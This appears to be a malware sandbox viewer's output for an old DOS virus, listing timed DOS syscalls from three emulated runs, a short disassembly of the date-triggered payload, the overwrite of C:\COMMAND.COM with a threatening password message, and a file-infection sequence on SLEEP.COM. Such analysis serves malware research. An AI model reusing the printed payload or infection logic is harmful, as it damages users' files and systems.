Sample viewer

vx.netlux.org/Virus.DOS.MutaGen.100.Secret.2094

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:19:04.841622262Z	42	PC: 12a50 \| Get date 0x12a50: cmp dl, 0x11 0x12a53: jne 0x12aae 0x12a55: mov ax, 0x4301 0x12a58: mov cx, 0x20 0x12a5b: lea dx, word ptr [bp + 0x2a5] 0x12a5f: int 0x21 0x12a61: mov ax, 0x3d02 0x12a64: lea dx, word ptr [bp + 0x2a5] 0x12a68: int 0x21 0x12a6a: mov bx, ax 0x12a6c: mov ah, 0x40 0x12a6e: mov cx, 0x12 0x12a71: lea dx, word ptr [bp + 0x15c] 0x12a75: int 0x21 0x12a77: mov ah, 2 0x12a79: mov bh, 0 0x12a7b: mov dx, 0 0x12a7e: int 0x10 0x12a80: mov ah, 9 0x12a82: lea dx, word ptr [bp + 0x305]
2018-12-17T22:19:04.844502596Z	67	PC: 12a61 \| Get or set file attributes
2018-12-17T22:19:05.185069141Z	61	PC: 12a6a \| Open file (Filename = 'C:\COMMAND.COM')
2018-12-17T22:19:05.192030669Z	64	PC: 12a77 \| Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:19:05.19642066Z	9	PC: 12a88 \| Display string (String= 'I AM GOING TO FUCK YOUR HARD DISK IF YOU DON'T TYPE THE RIGHT PASSWORD. DON'T TURN OFF YOUR COMPUTER BECAUSE I ALREADY FUCKED YOUR HARD DISK AND I WILL FIX IT ONLY IF YOU ENTER THE RIGHT PASSWORD!!! PASSWORD IS:')
2018-12-17T22:19:05.201133185Z	12	PC: 12a8e \| Flush input buffer and input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3283,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:48:45.797692861Z	42	PC: 12a50 \| Get date 0x12a50: cmp dl, 0x11 0x12a53: jne 0x12aae 0x12a55: mov ax, 0x4301 0x12a58: mov cx, 0x20 0x12a5b: lea dx, word ptr [bp + 0x2a5] 0x12a5f: int 0x21 0x12a61: mov ax, 0x3d02 0x12a64: lea dx, word ptr [bp + 0x2a5] 0x12a68: int 0x21 0x12a6a: mov bx, ax 0x12a6c: mov ah, 0x40 0x12a6e: mov cx, 0x12 0x12a71: lea dx, word ptr [bp + 0x15c] 0x12a75: int 0x21 0x12a77: mov ah, 2 0x12a79: mov bh, 0 0x12a7b: mov dx, 0 0x12a7e: int 0x10 0x12a80: mov ah, 9 0x12a82: lea dx, word ptr [bp + 0x305]
2018-12-25T11:48:45.800217365Z	71	PC: 12ab8 \| Get current directory
2018-12-25T11:48:45.804535694Z	26	PC: 12ac0 \| Set disk transfer address
2018-12-25T11:48:45.806379087Z	78	PC: 12b00 \| Find first file
2018-12-25T11:48:45.828233701Z	67	PC: 12b1e \| Get or set file attributes
2018-12-25T11:48:45.834442801Z	67	PC: 12b2a \| Get or set file attributes
2018-12-25T11:48:45.852348612Z	61	PC: 12b33 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:45.861108943Z	63	PC: 12b40 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:48:45.868078884Z	66	PC: 12b48 \| Move file pointer
2018-12-25T11:48:45.869537665Z	87	PC: 12b7b \| Get or set file date and time
2018-12-25T11:48:45.873850762Z	64	PC: 12ba2 \| Write file or device (Write 986 bytes on handle 5)
2018-12-25T11:48:45.884090787Z	66	PC: 12baa \| Move file pointer
2018-12-25T11:48:45.886315818Z	64	PC: 12bb5 \| Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:45.89385632Z	87	PC: 12bc2 \| Get or set file date and time
2018-12-25T11:48:45.895587714Z	62	PC: 12bca \| Close file
2018-12-25T11:48:45.904508633Z	67	PC: 12bd7 \| Get or set file attributes
2018-12-25T11:48:45.915189258Z	79	PC: 12b00 \| Find next file (See above)
2018-12-25T11:48:45.918537406Z	67	PC: 12b1e \| Get or set file attributes (See above)
2018-12-25T11:48:45.924592447Z	67	PC: 12b2a \| Get or set file attributes (See above)
2018-12-25T11:48:45.934962173Z	61	PC: 12b33 \| Open file (See above)
2018-12-25T11:48:45.949108275Z	63	PC: 12b40 \| Read file or device (See above)
2018-12-25T11:48:45.955906377Z	66	PC: 12b48 \| Move file pointer (See above)
2018-12-25T11:48:45.957275359Z	87	PC: 12b7b \| Get or set file date and time (See above)

{"DateBased":true,"Day":17,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3283,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:48:46.132248408Z	42	PC: 12a50 \| Get date 0x12a50: cmp dl, 0x11 0x12a53: jne 0x12aae 0x12a55: mov ax, 0x4301 0x12a58: mov cx, 0x20 0x12a5b: lea dx, word ptr [bp + 0x2a5] 0x12a5f: int 0x21 0x12a61: mov ax, 0x3d02 0x12a64: lea dx, word ptr [bp + 0x2a5] 0x12a68: int 0x21 0x12a6a: mov bx, ax 0x12a6c: mov ah, 0x40 0x12a6e: mov cx, 0x12 0x12a71: lea dx, word ptr [bp + 0x15c] 0x12a75: int 0x21 0x12a77: mov ah, 2 0x12a79: mov bh, 0 0x12a7b: mov dx, 0 0x12a7e: int 0x10 0x12a80: mov ah, 9 0x12a82: lea dx, word ptr [bp + 0x305]
2018-12-25T11:48:46.135133934Z	67	PC: 12a61 \| Get or set file attributes
2018-12-25T11:48:46.476899065Z	61	PC: 12a6a \| Open file (Filename = 'C:\COMMAND.COM')
2018-12-25T11:48:46.483866657Z	64	PC: 12a77 \| Write file or device (Write 18 bytes on handle 5)
2018-12-25T11:48:46.488263981Z	9	PC: 12a88 \| Display string (String= 'I AM GOING TO FUCK YOUR HARD DISK IF YOU DON'T TYPE THE RIGHT PASSWORD. DON'T TURN OFF YOUR COMPUTER BECAUSE I ALREADY FUCKED YOUR HARD DISK AND I WILL FIX IT ONLY IF YOU ENTER THE RIGHT PASSWORD!!! PASSWORD IS:')
2018-12-25T11:48:46.494239329Z	12	PC: 12a8e \| Flush input buffer and input